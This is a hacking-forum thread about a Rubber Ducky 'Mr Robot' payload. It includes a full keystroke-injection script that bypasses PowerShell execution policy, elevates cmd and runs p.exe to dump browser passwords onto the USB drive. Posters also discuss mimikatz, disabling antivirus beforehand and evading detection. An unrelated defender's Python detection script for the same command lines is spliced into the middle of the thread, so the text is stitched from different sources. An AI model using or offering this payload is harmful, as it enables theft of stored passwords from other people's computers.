M@$T

Mr Robot Hack


Keep in mind, this is not what I intended to release. This was just a few hours' work taking two separate tools already available, heavily gutting and jerry-rigging them just enough that I knew that it would work in concept. Prior to starting this project, I had zero experience in PowerShell (besides using it to run common/simple things often used in CMD), so I was teaching myself as I went by tracing the code already there and experimenting. If you see some edits I've made and it looks sloppy as all hell, or there are multiple lines of code that could easily be a few bits of code, or you see redundant variables/daisy-chained variables, it's probably because I was changing little bits of code around to test and learn, after which I know there is a ton of code cleanup to do as well as removing lots of unnecessary code left over from separate functions the tool could do for which I didn't have any use. But, if anyone sees any errors that would be a good learning opportunity, I would love to hear what you have to say. I'm a sponge for knowledge and I look forward to slowly tweaking everything and making it efficient and adding a handful of other handy features.

 

TL;DR - I'm brand new at PowerShell. It's messy. I'm sorry, but I'm just sharing what I have in hopes other newbies at PS can learn something as well. Hopefully someone finds something useful here, or at least it can serve as a springboard for some way cooler shit.

 

Cheers,

-Enzym3

On 9/14/2016 at 2:50 PM, EvilTtaM said:

I attached the Ducky Code I used. If there are any suggestions for changes, please let me know. I will add that this code assumes that the executionpolicy is set to bypass; however, it could be written in to change that.

15secondhack.txt

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?


Thanks for all this Enzym3.

Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe?

 


Is there a way you can make it so I can run it on the normal duck instead of the twin duck? Either way, thanks.

On 2016-12-08 at 6:42 PM, Mr.X said:

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

I got the same error for whiterabbit.ps1


Here is a payload that will run the p.exe using command prompt instead of powershell...

I wanted this because not all computers have powershell enabled but they all have command prompt ;)

DELAY 1200
GUI R
DELAY 300
STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"
DELAY 200
ENTER
DELAY 500
ALT y
DELAY 100
LEFTARROW
DELAY 200
DELETE
DELAY 200
STRING mode con lines=1 cols=18
DELAY 80
ENTER
DELAY 80
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d
DELAY 250
ENTER
DELAY 200
STRING %duck%
ENTER
DELAY 150
STRING p.exe /stext pass.txt
DELAY 100
ENTER
DELAY 2000
STRING exit
DELAY 80
ENTER

I'm not 100% sure why I need the LEFTARROW or DELETE commands. I'm thinking of taking them out, but I also grabbed portions of this from elsewhere of course and they were there.

Open to suggestions.


Sorry, forgot to mention that p.exe grabs the browser passwords and you need the twin duck firmware installed to be able to save them onto the USB in this script.
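For defenders: the command lines typed by the payload above appear in process-creation logging, and the following added example (not code from this thread or its posters) correlates them per host inside a short time window. Host names, timestamps, the E: drive letter, the rule names, the 30-second window and the threshold of 3 are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Patterns derived from the command lines the payload in this thread types.
RULES = {
    "ps_bypass_elevate": re.compile(
        r"powershell.*-exec\w*\s+bypass.*start-process.*-verb\s+runas", re.I),
    "tiny_console": re.compile(r"\bmode(\.com)?\s+con\b.*\b(lines|cols)=\d+", re.I),
    "volume_label_lookup": re.compile(r"\bwmic(\.exe)?\s+volume\s+get\b.*\blabel\b", re.I),
    "stext_export": re.compile(r"\s/stext\s+\S+", re.I),
}
WINDOW = timedelta(seconds=30)  # assumption: injected keystrokes finish within seconds
THRESHOLD = 3                   # assumption: distinct rules required before alerting

# Constructed process-creation records (host, time, command line); not real logs.
SAMPLE_EVENTS = [
    ("WS-01", "2016-12-20T10:15:02",
     'powershell.exe -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"'),
    ("WS-01", "2016-12-20T10:15:04", "mode con lines=1 cols=18"),
    ("WS-01", "2016-12-20T10:15:05", "wmic volume get driveletter, label"),
    ("WS-01", "2016-12-20T10:15:07", r"E:\p.exe /stext pass.txt"),
    # Routine admin activity: one rule fires, so no alert.
    ("WS-02", "2016-12-20T11:00:00",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    ("WS-02", "2016-12-20T11:00:09", "wmic volume get driveletter, label"),
    # Three rules spread over hours: outside the window, so no alert.
    ("WS-03", "2016-12-20T09:00:00", "wmic volume get driveletter, label"),
    ("WS-03", "2016-12-20T11:30:00", "mode con lines=40 cols=120"),
    ("WS-03", "2016-12-20T15:00:00", r"C:\Tools\export.exe /stext report.txt"),
]

def hunt(events, window=WINDOW, threshold=THRESHOLD):
    """Alert per host when >= threshold distinct rules fire within the window."""
    hits = {}
    for host, ts, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    alerts = []
    for host, found in sorted(hits.items()):
        found.sort()
        for start, _ in found:
            names = {n for t, n in found if timedelta(0) <= t - start <= window}
            if len(names) >= threshold:
                alerts.append({"host": host, "start": start.isoformat(),
                               "rules": sorted(names)})
                break
    return alerts

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

Requiring several distinct rules inside one window keeps single admin commands, such as a lone `wmic volume` query, from alerting on their own.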

 

15 hours ago, authorityfinger said:

Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :(

Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine.


See, that's the thing. I know we are just being a bunch of script kiddies and that is why AV is detecting us, but there needs to be a way to go unnoticed. I mean, that is the purpose of this isn't it?
